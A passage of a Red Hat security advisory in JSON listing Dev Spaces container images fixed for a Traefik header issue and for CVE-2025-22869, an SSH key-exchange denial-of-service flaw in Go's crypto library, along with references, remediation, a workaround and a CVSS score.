"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "traefik: HTTP client can manipulate custom HTTP headers that are added by Traefik"
},
{
"cve": "CVE-2025-22869",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-02-26T04:00:47.683125+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2348367"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the golang.org/x/crypto/ssh package. SSH clients and servers are vulnerable to increased resource consumption, possibly leading to memory exhaustion and a DoS. This can occur during key exchange when the other party is slow to respond during key exchange.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "While this flaw affects both SSH clients and servers implemented with golang.org/x/crypto/ssh, realistically the flaw will only lead to a DoS when transferring large files, greatly reducing the likelihood of exploitation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-22869"
},
{
"category": "external",
"summary": "RHBZ#2348367",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2348367"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-22869",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22869"
},
{
"category": "external",
"summary": "https://go.dev/cl/652135",
"url": "https://go.dev/cl/652135"
},
{
"category": "external",
"summary": "https://go.dev/issue/71931",
"url": "https://go.dev/issue/71931"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3487",
"url": "https://pkg.go.dev/vuln/GO-2025-3487"
}
],
"release_date": "2025-02-26T03:07:48.855000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-05-28T02:39:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
},
{
"category": "workaround",
"details": "This flaw can be mitigated when using the client only connecting to trusted servers.",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
